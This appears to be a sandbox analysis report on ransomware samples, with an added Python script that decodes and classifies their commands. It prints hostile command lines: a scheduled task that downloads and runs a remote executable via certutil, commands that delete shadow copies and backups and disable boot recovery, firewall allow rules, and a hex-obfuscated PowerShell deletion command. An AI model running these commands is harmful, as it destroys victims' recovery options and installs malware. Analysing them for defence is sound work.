Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = 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 | HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = 50005900530041000000 | HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00403.7z"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2784
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /12⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4572
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.MSIL.Blocker.gen-86321c281edaeefe2a34647a20cdba5fd5479fcfb81e57fdce5158e6836a33a8.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-86321c281edaeefe2a34647a20cdba5fd5479fcfb81e57fdce5158e6836a33a8.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:648 -
C:\Users\Admin\AppData\Roaming\backup.exe"C:\Users\Admin\AppData\Roaming\backup.exe"4⤵
- Executes dropped EXE
PID:5444
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.MSIL.Encoder.gen-6b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab.exeHEUR-Trojan-Ransom.MSIL.Encoder.gen-6b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4728 -
C:\Windows\SysWOW64\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Updates\h.vbs" "C:\Updates\ZTH.bat"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Updates\ZTH.bat" "5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:844 -
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v UpdateHandler /d "wscript "C:\Updates\h.vbs" "C:\Updates\Exec.bat""6⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2636
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Blocker.gen-6e16a8eb2393714ab17c800d07663242aacb62a88e1044555271083b4a5c75b5.exeHEUR-Trojan-Ransom.Win32.Blocker.gen-6e16a8eb2393714ab17c800d07663242aacb62a88e1044555271083b4a5c75b5.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1824 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 16124⤵
- Program crash
PID:7040
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exeHEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2116 -
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe"C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
PID:2984 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\86ddda386cc8\86ddda386cc8.exe" enable=yes"5⤵
PID:7388
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\86ddda386cc8\86ddda386cc8.exe" enable=yes6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:8584
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
PID:2444
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2408
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:8636 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Scheduled Task/Job: Scheduled Task
PID:8932
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F6⤵
- Scheduled Task/Job: Scheduled Task
PID:6320
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"6⤵
- Executes dropped EXE
PID:7868
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v6⤵
- Modifies boot configuration data using bcdedit
PID:7752
-
-
-
-
-
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exeHEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe3⤵
- Drops startup file
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{59C6D001-2A1D-495D-B41C-13CF70E22926}'" delete4⤵
- Suspicious use of WriteProcessMemory
PID:3440 -
C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{59C6D001-2A1D-495D-B41C-13CF70E22926}'" delete5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4008
-
-
-
-
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Encoder.gen-20371b37bbc403adb84e5f0896c843ea0c97cbed74362251a776f0f89b37e043.exeHEUR-Trojan-Ransom.Win32.Encoder.gen-20371b37bbc403adb84e5f0896c843ea0c97cbed74362251a776f0f89b37e043.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3128
-
-
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Foreign.vho-c3aa5acfc410447b8295039ab0721db78b4cc2a0f9773e63c3afbf2d98e57f2f.exeHEUR-Trojan-Ransom.Win32.Foreign.vho-c3aa5acfc410447b8295039ab0721db78b4cc2a0f9773e63c3afbf2d98e57f2f.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1056
-
-
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-e7f27619b2dbf3427639a1d821b12022544c4279c57079d8c06df8d276e47b0c.exeHEUR-Trojan-Ransom.Win32.GandCrypt.gen-e7f27619b2dbf3427639a1d821b12022544c4279c57079d8c06df8d276e47b0c.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3448 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 4884⤵
- Program crash
PID:2448
-
-
-
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exeHEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- System policy modification
PID:2792 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\update.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:5076
-
-
-
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exeHEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Enumerates connected drives
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:3088 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet4⤵PID:6696
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:6872
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete5⤵PID:2184
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
PID:5540
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no5⤵
- Modifies boot configuration data using bcdedit
PID:3656
-
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet5⤵
- Deletes backup catalog
PID:7444
-
-
-
-
C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exeTrojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer start page
- Suspicious use of SetWindowsHookEx
PID:1264
-
-
C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exeTrojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4996
-
-
C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exeTrojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4736 -
C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exeTrojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3404
-
-
-
C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exeTrojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"4⤵
- Command and Scripting Interpreter: PowerShell
PID:5296
-
-
-
C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Encoder.dkc-2940604e31753c75f80a85b2ead90cd63bdcf2fe05094ceeec99ac35c7d898a3.exeTrojan-Ransom.Win32.Encoder.dkc-2940604e31753c75f80a85b2ead90cd63bdcf2fe05094ceeec99ac35c7d898a3.exe3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5520
-
-
C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Encoder.ktf-559440f61d38495c433fea442a58b4831422d52a04da1ef7f8e43b17a736a8fd.exeTrojan-Ransom.Win32.Encoder.ktf-559440f61d38495c433fea442a58b4831422d52a04da1ef7f8e43b17a736a8fd.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5044 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\server.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:5896 -
C:\Users\Admin\AppData\Local\Temp\CyberPunk2077.sfx.exeCyberPunk2077.sfx.exe -p1234 -dC:\Users\Admin\AppData\Local\Temp5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5472 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\CyberPunk2077.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\CyberPunk2077.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1324 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\CyberPunk2077.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\CyberPunk2077.exe"7⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5800
-
-
-
-
-
-
C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Foreign.nmxn-a7c1706b88b29404d24806876ad8b4473d2f515ea517605d8568c6f1c686b594.exeTrojan-Ransom.Win32.Foreign.nmxn-a7c1706b88b29404d24806876ad8b4473d2f515ea517605d8568c6f1c686b594.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5908 -
C:\Windows\SysWOW64\svchost.exe"C:\Windows\SysWOW64\svchost.exe"4⤵
- Adds Run key to start application
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:4292 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4292 -s 7205⤵
- Program crash
PID:5744
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4292 -s 7285⤵
- Program crash
PID:5608
-
-
-
-
C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Foreign.ofkr-508929881cfc28b3bd540c9faba556004322f050a6b57916a2cd368ca8c02f05.exeTrojan-Ransom.Win32.Foreign.ofkr-508929881cfc28b3bd540c9faba556004322f050a6b57916a2cd368ca8c02f05.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5892 -
C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Foreign.ofkr-508929881cfc28b3bd540c9faba556004322f050a6b57916a2cd368ca8c02f05.exeTrojan-Ransom.Win32.Foreign.ofkr-508929881cfc28b3bd540c9faba556004322f050a6b57916a2cd368ca8c02f05.exe4⤵
- Executes dropped EXE
PID:6128
-
-
-
C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Foreign.olkm-9595601c79e5083741e6d95a280426dafdff157af2f8693f05254520ba1d5036.exeTrojan-Ransom.Win32.Foreign.olkm-9595601c79e5083741e6d95a280426dafdff157af2f8693f05254520ba1d5036.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:6072
-
-
C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Gen.yfd-5dc8fd209538c67f0a27c941047bf4349354ca41bd2da45683890f0a2da9a7e6.exeTrojan-Ransom.Win32.Gen.yfd-5dc8fd209538c67f0a27c941047bf4349354ca41bd2da45683890f0a2da9a7e6.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6876 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 4724⤵
- Program crash
PID:6920
-
-
-
C:\Users\Admin\Desktop\00403\UDS-Trojan-Ransom.Win32.Encoder-63764b471e90d681575d0acd501f8329d1b34b20e78c5d60930e6af3de3243be.exeUDS-Trojan-Ransom.Win32.Encoder-63764b471e90d681575d0acd501f8329d1b34b20e78c5d60930e6af3de3243be.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6448 -
C:\Users\Admin\AppData\Local\Temp\497D8E.exeC:\Users\Admin\AppData\Local\Temp\497D8E.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:6948
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3448 -ip 34481⤵PID:1192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4292 -ip 42921⤵PID:276
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 6876 -ip 68761⤵PID:256
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4292 -ip 42921⤵PID:6652
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1824 -ip 18241⤵PID:6096
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\readme.txt1⤵
- Opens file in notepad (likely ransom note)
PID:1008
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6524
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\README.d96d1f6d.TXT1⤵
- Opens file in notepad (likely ransom note)
PID:5664
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵PID:3592
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1160
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:7264
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:7356 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\Readme.README2⤵
- Opens file in notepad (likely ransom note)
PID:5084
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x41c 0x3f81⤵PID:6148
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:6552
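The tree above mixes a hex-built PowerShell one-liner (PID 5296, under the Darkside sample) with plain-text recovery-inhibition commands (PIDs 6696 and 4008) and persistence setup (PIDs 8584 and 6320). The script below is an added example and is not part of the sandbox report: it reproduces the PowerShell loop statically instead of running it, tags each command line by behaviour, and flags the tags that correspond to ATT&CK T1490 (Inhibit System Recovery). The sample command lines are copied from this page; the rule names and the `decode_hex_loop`, `classify`, `triage` and `inhibits_recovery` helpers are this example's own. One caveat it encodes: `bcdedit /v` (PID 7752) only prints the boot store, so the boot-recovery rule requires `/set` with `recoveryenabled no` or `bootstatuspolicy ignoreallfailures`.

```python
"""Added triage helper for the process tree above: decode the hex-built
PowerShell loop and tag command lines by ransomware-style behaviour."""
import re
from typing import Dict, List, Optional

# Command lines copied from the process tree on this page, keyed by PID.
# This is a constructed sample; the DarkSide hex loop is copied verbatim.
SAMPLE_CMDLINES: Dict[int, str] = {
    5296: r'''powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"''',
    6696: r'''"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet''',
    4008: r'''C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{59C6D001-2A1D-495D-B41C-13CF70E22926}'" delete''',
    8584: r'''netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\86ddda386cc8\86ddda386cc8.exe" enable=yes''',
    6320: r'''schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F''',
    7752: r'''C:\Windows\Sysnative\bcdedit.exe /v''',
    1008: r'''"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\readme.txt''',
}

# Matches the loop shape  (0..N)|%{$s+=[char][byte]('0x'+'<hex>'.Substring(2*$_,2))}
HEX_LOOP = re.compile(
    r"\(0\.\.(?P<last>\d+)\).*?'0x'\+'(?P<hex>[0-9A-Fa-f]+)'\.Substring\(2\*\$_,2\)"
)

# Behaviour rules (regex, case-insensitive). The bcdedit rule deliberately
# requires /set: "bcdedit /v" only prints the boot store and changes nothing.
RULES: Dict[str, List[str]] = {
    "shadow_copy_deletion": [
        r"vssadmin(?:\.exe)?\s+delete\s+shadows",
        r"wmic(?:\.exe)?\s+shadowcopy\b.*\bdelete\b",
        r"win32_shadowcopy\b.*\.delete\(\)",
    ],
    "backup_catalog_deletion": [r"wbadmin(?:\.exe)?\s+delete\s+catalog"],
    "boot_recovery_disabled": [
        r"bcdedit(?:\.exe)?\s+/set\b.*\b(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b",
    ],
    "firewall_allow_rule": [
        r"netsh(?:\.exe)?\s+advfirewall\s+firewall\s+add\s+rule\b.*\baction=allow\b",
    ],
    "logon_task_highest_rl": [
        r"schtasks(?:\.exe)?\s+/create\b.*\s/sc\s+onlogon\b.*\s/rl\s+highest\b",
    ],
    "certutil_download": [r"certutil(?:\.exe)?\s.*-urlcache\b"],
    "hex_built_powershell": [r"\[char\]\[byte\]\(\s*'0x'"],
}

# Tags that mean the sample is destroying the host's own recovery options (T1490).
INHIBIT_RECOVERY = {"shadow_copy_deletion", "backup_catalog_deletion", "boot_recovery_disabled"}


def decode_hex_loop(cmdline: str) -> Optional[str]:
    """Reproduce the PowerShell loop statically: for $_ in 0..last, take the two
    hex digits at offset 2*$_ and cast them to a char. Returns None when the
    shape is absent or the range would read past the hex literal."""
    m = HEX_LOOP.search(cmdline)
    if not m:
        return None
    last, hexstr = int(m.group("last")), m.group("hex")
    if 2 * (last + 1) > len(hexstr):
        return None
    return "".join(chr(int(hexstr[2 * i:2 * i + 2], 16)) for i in range(last + 1))


def classify(cmdline: str) -> List[str]:
    """Tag one command line. Hex-built PowerShell is decoded first so the rules
    see the payload (here a WMI Win32_Shadowcopy deletion), not only the loop."""
    decoded = decode_hex_loop(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    return sorted(
        name for name, patterns in RULES.items()
        if any(re.search(p, text, re.IGNORECASE) for p in patterns)
    )


def triage(cmdlines: Dict[int, str]) -> Dict[int, List[str]]:
    """Classify every PID's command line."""
    return {pid: classify(cl) for pid, cl in cmdlines.items()}


def inhibits_recovery(tags: List[str]) -> bool:
    """True when any tag maps to ATT&CK T1490 (Inhibit System Recovery)."""
    return bool(INHIBIT_RECOVERY.intersection(tags))


if __name__ == "__main__":
    for pid, tags in triage(SAMPLE_CMDLINES).items():
        flag = "RECOVERY-INHIBIT" if inhibits_recovery(tags) else ""
        print(f"{pid:>5}  {', '.join(tags) or '-':<70} {flag}")
    print("decoded:", decode_hex_loop(SAMPLE_CMDLINES[5296]))
```

Run as a script it prints one row per PID. PID 5296 is tagged shadow_copy_deletion even though its raw command line never names a shadow-copy tool, because the decoded payload is a WMI Win32_Shadowcopy enumeration with Delete() on each instance; that is the reason to decode before matching rather than alert on the loop shape alone.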
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (2)
  - PowerShell (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
- Windows Management Instrumentation (1)
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
- Pre-OS Boot (1)
  - Bootkit (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Defense Evasion
- Direct Volume Access (1)
- Impair Defenses (1)
  - Disable or Modify System Firewall (1)
- Indicator Removal (3)
  - File Deletion (3)
- Modify Registry (4)
- Pre-OS Boot (1)
  - Bootkit (1)
- Virtualization/Sandbox Evasion (2)
Credential Access
- Credentials from Password Stores (2)
  - Credentials from Web Browsers (1)
  - Windows Credential Manager (1)
- Unsecured Credentials (1)
  - Credentials In Files (1)
Downloads
- Filesize: 209KB
  MD5: d233eef438a2a99e1438fba6e6461043
  SHA1: d9cc485124a1fbb8c5cad3a096b2113d3780baf3
  SHA256: ada7349b9242d8c1ec6cc7f4d7c8b17d6a2d9d6c1bb160bd3998ededa3900251
  SHA512: dd496880361c9c68e770c09285f7b60e938a32f10d4bb03536169690623b2b657ae43fc9219982d50d5bb856ca66636380b98375101502b41c825ab18d533bba
- Filesize: 1KB
  MD5: 65b045a29c11fd41c72a74a784081bdc
  SHA1: 20d7079bc7c6262f3b4a56220e30285101c1fc5d
  SHA256: 2ecc0df9b581b25f9072d51160a6c4b983dc88de1da5e752cc5266ee26cacf42
  SHA512: d6f7ce54e86636adb1e2fd6904732709762a043318bc9d3c32341d629c408a630741916008a01596636d2ab3d2115859483ec92e957693e28fc281f76f0e5bfe
